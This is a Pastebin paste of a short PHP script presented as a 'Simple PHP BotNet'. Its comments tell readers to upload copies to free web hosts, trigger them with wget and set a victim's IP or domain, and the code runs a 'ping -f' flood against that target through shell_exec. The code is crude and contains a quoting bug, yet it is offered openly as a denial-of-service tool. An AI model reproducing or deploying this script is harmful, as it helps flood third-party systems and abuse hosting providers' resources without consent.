Guest User

Untitled

a guest
May 17th, 2018
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.72 KB | None | 0 0
  1. <?php
  2. /******************************************
  3.  * Simple PHP BotNet.
  4.  * Simply hit this script with your web browser, or wget it from another server
  5.  * and let the Lulz ensue.
  6.  * This works best on linux. Not tested on windows.
  7.  *
  8.  * How To: Upload them to free web hosts, then make a script that wget's them, and let the lulz ensue.
  9.  *
  10.  * Config
  11.  * Set the victims ip/hostname below.
  12.  * Can change command aswell, if you dont like the default options.
  13.  ******************************************/
  14. //10 year old hacker tryhard section
  15. $victim = 'ip/domain here.';
  16. //end 10 year old hacker tryhard section
  17.  
  18. //command (Change if you wish, but it's not really nessessary).
  19. $c = 'ping -f $victim';
  20.  
  21. shell_exec($c);
  22.  
  23. ?>
Add Comment
Please, Sign In to add comment